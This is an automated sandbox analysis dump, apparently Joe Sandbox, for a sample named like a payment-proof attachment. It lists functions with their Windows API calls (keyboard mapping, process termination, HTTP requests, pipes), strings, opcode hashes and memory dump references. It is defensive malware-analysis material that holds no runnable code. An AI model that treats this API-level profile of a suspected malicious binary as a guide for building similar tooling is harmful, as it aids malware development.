API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 33844b3b80a30b20190520ae021269931618b989642c4a18967e8e64ffb816b5
Instruction ID: 78cf129ecdc7a715374cf4134b8eeab6aee5f6afb47dfc681ae2eff070895c73
Opcode Fuzzy Hash: 33844b3b80a30b20190520ae021269931618b989642c4a18967e8e64ffb816b5
Instruction Fuzzy Hash: 34F06D3250D3121AE62576747C06A4A3787AB41730B2C069BF8A0DE3DAFB2988417260

Function 00FB27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB2825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB2830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB2843
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB284B

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 3b309680583a7b64cc01c3dc05fea56c933a7ed214b64222434e609e0f7efd44
Instruction ID: df9b7c8c5de4c7db8bcd7366baceebdf2dc4293855e2e7939d871231c10ae2ff
Opcode Fuzzy Hash: 3b309680583a7b64cc01c3dc05fea56c933a7ed214b64222434e609e0f7efd44
Instruction Fuzzy Hash: 6F0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5

Function 00FF9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 4620fe230f0a202b2f69fd598cc9b828bbf309e592825f827d33a79dafb6a422
Instruction ID: 6ed475063c43cc248e108a67ec6bb3108c94cf439b5bdef3a0b602a8fd85cef7
Opcode Fuzzy Hash: 4620fe230f0a202b2f69fd598cc9b828bbf309e592825f827d33a79dafb6a422
Instruction Fuzzy Hash: 6C01D632505212ABD7252B95EC48EFB776EFF893217440029F64392094DBED9810EB50

Function 00FF7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FF7C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FF7C1D
GetWindowThreadProcessId.USER32(?,?), ref: 00FF7C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FF7C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FF7C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FF7C4C

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 793fda45a4660220456d9ec8d1de88f034e55478c2f1ddec18936b8425f00cc8
Instruction ID: 2be79ad3dd5d87b0a60274fae0a8a4e68cc217857603475b66b03e933751d16e
Opcode Fuzzy Hash: 793fda45a4660220456d9ec8d1de88f034e55478c2f1ddec18936b8425f00cc8
Instruction Fuzzy Hash: 13F09A72201158BBE7301BA29C0EEEF7B7CEFCAB11F400018FA4191040D7AA1A41E7B4

Function 00FF9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00FF9A33
EnterCriticalSection.KERNEL32(?,?,?,?,01025DEE,?,?,?,?,?,00FBED63), ref: 00FF9A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,01025DEE,?,?,?,?,?,00FBED63), ref: 00FF9A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,01025DEE,?,?,?,?,?,00FBED63), ref: 00FF9A5E

Part of subcall function 00FF93D1: CloseHandle.KERNEL32(?,?,00FF9A6B,?,?,?,01025DEE,?,?,?,?,?,00FBED63), ref: 00FF93DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 00FF9A71
LeaveCriticalSection.KERNEL32(?,?,?,?,01025DEE,?,?,?,?,?,00FBED63), ref: 00FF9A78

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: b78af8e3506508f16c3ba23be902151aadc2823c7d1816959e692b765354b98c
Instruction ID: b043f2a6a1849a452bca24444d1fb1bb050fe8c749fef950c4ae1ec428729fd6
Opcode Fuzzy Hash: b78af8e3506508f16c3ba23be902151aadc2823c7d1816959e692b765354b98c
Instruction Fuzzy Hash: B2F05E32545211ABD7211BE4FC89EEA773EFF95321B940425F643910A8DBBE9811EB50

Function 00FB1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 00FCF4EA: std::exception::exception.LIBCMT ref: 00FCF51E
Part of subcall function 00FCF4EA: __CxxThrowException@8.LIBCMT ref: 00FCF533

__swprintf.LIBCMT ref: 00FB1EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FB1D49

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: c0fc804d05a6f42ded4d470841d9503a08e27e954f87c849091d487f7ddf92e2
Instruction ID: 892f5b32a53aa44aa49ee13483ec1198742acc6464d1910ed8d9029481ff69c9
Opcode Fuzzy Hash: c0fc804d05a6f42ded4d470841d9503a08e27e954f87c849091d487f7ddf92e2
Instruction Fuzzy Hash: 4491AB711082119FD724EF29CD96CAFBBE4BF85700F04492DF985972A1DB34E904DB92

Function 0100AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0100B006
CharUpperBuffW.USER32(?,?), ref: 0100B115
VariantClear.OLEAUT32(?), ref: 0100B298

Part of subcall function 00FF9DC5: VariantInit.OLEAUT32(00000000), ref: 00FF9E05
Part of subcall function 00FF9DC5: VariantCopy.OLEAUT32(?,?), ref: 00FF9E0E
Part of subcall function 00FF9DC5: VariantClear.OLEAUT32(?), ref: 00FF9E1A

Strings

AUTOIT.ERROR, xrefs: 0100B11B
Incorrect Parameter format, xrefs: 0100B03E, 0100B20B

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: ae1aa64fcd6984de6ba55120b9aadbe45762ddb20463bd87bb3b8b863c784e42
Instruction ID: 8c40ca8ca460ff4908ddb12dd2e3ec05cbdb8aa210466290a129190d63dbd930
Opcode Fuzzy Hash: ae1aa64fcd6984de6ba55120b9aadbe45762ddb20463bd87bb3b8b863c784e42
Instruction Fuzzy Hash: 80917C746083019FDB11DF29C88199EBBF4AF89704F04486DF99A9B392DB35E905CB52

Function 00FF5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FCC6F4: _wcscpy.LIBCMT ref: 00FCC717

_memset.LIBCMT ref: 00FF5438
GetMenuItemInfoW.USER32(?), ref: 00FF5467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FF5513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FF553D

Strings

0, xrefs: 00FF5430

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 659eb265c1075d3fee103f260ce1bfe37c7fa608c3bdf2dd9e4ff9e12806e891
Instruction ID: 7d2d7546133683d733336a05ebe84628b82b6c0c573d0cac30583472f84804e8
Opcode Fuzzy Hash: 659eb265c1075d3fee103f260ce1bfe37c7fa608c3bdf2dd9e4ff9e12806e891
Instruction Fuzzy Hash: 085135719047099BD314DA28C8817BBB7E9AF45B28F08052EFB95D31E1DB74CC44EB52

Function 00FF0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FF027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FF02B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FF02C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FF0344

Strings

DllGetClassObject, xrefs: 00FF02B7

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 2945cbe4b5df9a0d1f260e4f639d7d3807b8f8162158de6eb8ca2cb66c5d3ec6
Instruction ID: 6ba94827b82d2dcbf53dad71c9bcb59a35590a16924cba957f2c93a3be1baba6
Opcode Fuzzy Hash: 2945cbe4b5df9a0d1f260e4f639d7d3807b8f8162158de6eb8ca2cb66c5d3ec6
Instruction Fuzzy Hash: C3418FB1A00208EFDB15CF54C994BAA7BB9EF44310B1480ADEE09DF256DBB5D944DBA0

Function 00FF5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF5075
GetMenuItemInfoW.USER32 ref: 00FF5091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 00FF50D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01071708,00000000), ref: 00FF5120

Strings

0, xrefs: 00FF506D

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 81fcc4c73f3cb02e6409e864b33a5abe77b5e0990a29152798e46b810cf52fbf
Instruction ID: 0074196d3c915047a3f024f0a276f8854f9ee51f82aacd7fc3e5d6b9f4addd6c
Opcode Fuzzy Hash: 81fcc4c73f3cb02e6409e864b33a5abe77b5e0990a29152798e46b810cf52fbf
Instruction Fuzzy Hash: E841C1312047059FD720DF28DC84B6AB7E9AF89B24F04461EFBA5973A1D734E804DB62

Function 01010567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 01010587

Strings

stdcall, xrefs: 01010609
cdecl, xrefs: 010105DE
winapi, xrefs: 010105F8
none, xrefs: 01010662

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 47fe1631205ceeca2f244f92818710190c215b1de6bedd07dc00921c1a82ea8e
Instruction ID: 3274f3cf384a6d0166372c85d3f1a1db051e2c353e34e0b57306a68b2a810ed6
Opcode Fuzzy Hash: 47fe1631205ceeca2f244f92818710190c215b1de6bedd07dc00921c1a82ea8e
Instruction Fuzzy Hash: CB31B630500216AFCF00EF58CD429EEB3B8FF49314B108A59F4A6A76D5DB79E945CB80

Function 00FEB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FEB88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FEB8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 00FEB8D1

Strings

ComboBox, xrefs: 00FEB815
ListBox, xrefs: 00FEB84D

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 61eddd27faf77ae99ed09d6d265b4fc92a089999e6885ce8cf5a19cee0b596b9
Instruction ID: 6e98666244169e628bb896a641c46e56a92c57e15b195a39a55099c5775d0f45
Opcode Fuzzy Hash: 61eddd27faf77ae99ed09d6d265b4fc92a089999e6885ce8cf5a19cee0b596b9
Instruction Fuzzy Hash: 52210472900148AFDB14ABA6DC86EFF777CDF45354B104129F061A62D0DB794E0AAB60

Function 010043E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01004401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01004427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 01004457
InternetCloseHandle.WININET(00000000), ref: 0100449E

Part of subcall function 01005052: GetLastError.KERNEL32(?,?,010043CC,00000000,00000000,00000001), ref: 01005067

Strings

, xrefs: 01004450

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 7d44c2b4fb269f5b81c57de9acb003d4528e967eac42369524ac4d66ba458e9f
Instruction ID: 28ef3fd9d2b8b0a406634d2fff0666a0c1ffa8128ae63cd4446f198424a341c9
Opcode Fuzzy Hash: 7d44c2b4fb269f5b81c57de9acb003d4528e967eac42369524ac4d66ba458e9f
Instruction Fuzzy Hash: 1B2192B1500208BEF7239F94CC84EBF7AECFB48644F01801AF285D2180EE758D059775

Function 010190E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FCD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FCD1BA
Part of subcall function 00FCD17C: GetStockObject.GDI32(00000011), ref: 00FCD1CE
Part of subcall function 00FCD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FCD1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0101915C
LoadLibraryW.KERNEL32(?), ref: 01019163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01019178
DestroyWindow.USER32(?), ref: 01019180

Strings

SysAnimate32, xrefs: 01019137

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 28d1c1743ff9828df212befddb758e6180b20d193fb213978a76f8199b5febad
Instruction ID: fab4f94fdedf8138bdfa58911030e60764565ca93b34b8a93be3cd05524d0006
Opcode Fuzzy Hash: 28d1c1743ff9828df212befddb758e6180b20d193fb213978a76f8199b5febad
Instruction Fuzzy Hash: 09219F71600205BFEF214E68DC95EBA37EDEF89368F10065CFA9492199C73ADC91A760

Function 00FF9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00FF9588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FF95B9
GetStdHandle.KERNEL32(0000000C), ref: 00FF95CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00FF9605

Strings

nul, xrefs: 00FF9600

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 6c447d0bd88f840c4f305d0c6667add0dae09d7d29cf2fdfd53b64b6d1a09f05
Instruction ID: 53f48395a6e65eebab5a9806d97387181dd600b251c3f1e8b5e21bf9a83a8f2b
Opcode Fuzzy Hash: 6c447d0bd88f840c4f305d0c6667add0dae09d7d29cf2fdfd53b64b6d1a09f05
Instruction Fuzzy Hash: 5221B27190420DABDB219F65DC04BAAB7F8AF55730F284A19FEA1D72E0D7B1D940EB10

Function 00FF9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00FF9653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FF9683
GetStdHandle.KERNEL32(000000F6), ref: 00FF9694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00FF96CE

Strings

nul, xrefs: 00FF96C9

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 67c9ef27410a4cdc11a5af683ebdf51adb4354ed85fee7b64c34d020751ebba2
Instruction ID: a6ed6f9b33001ba78244b593a5ee2d2f506d183a1b844c9143a574235480b956
Opcode Fuzzy Hash: 67c9ef27410a4cdc11a5af683ebdf51adb4354ed85fee7b64c34d020751ebba2
Instruction Fuzzy Hash: D42171719042099BDB209F699C44FAAB7ECAF55734F200A19FAB1D72E0E7F19841DB50

Function 00FFDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FFDB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FFDB5E
__swprintf.LIBCMT ref: 00FFDB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,0104DC00), ref: 00FFDBB5

Strings

%lu, xrefs: 00FFDB71

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 6da12818dbd53f7f284d403d7a8713b3af8e4009961c119a3101a5cf6080a1f9
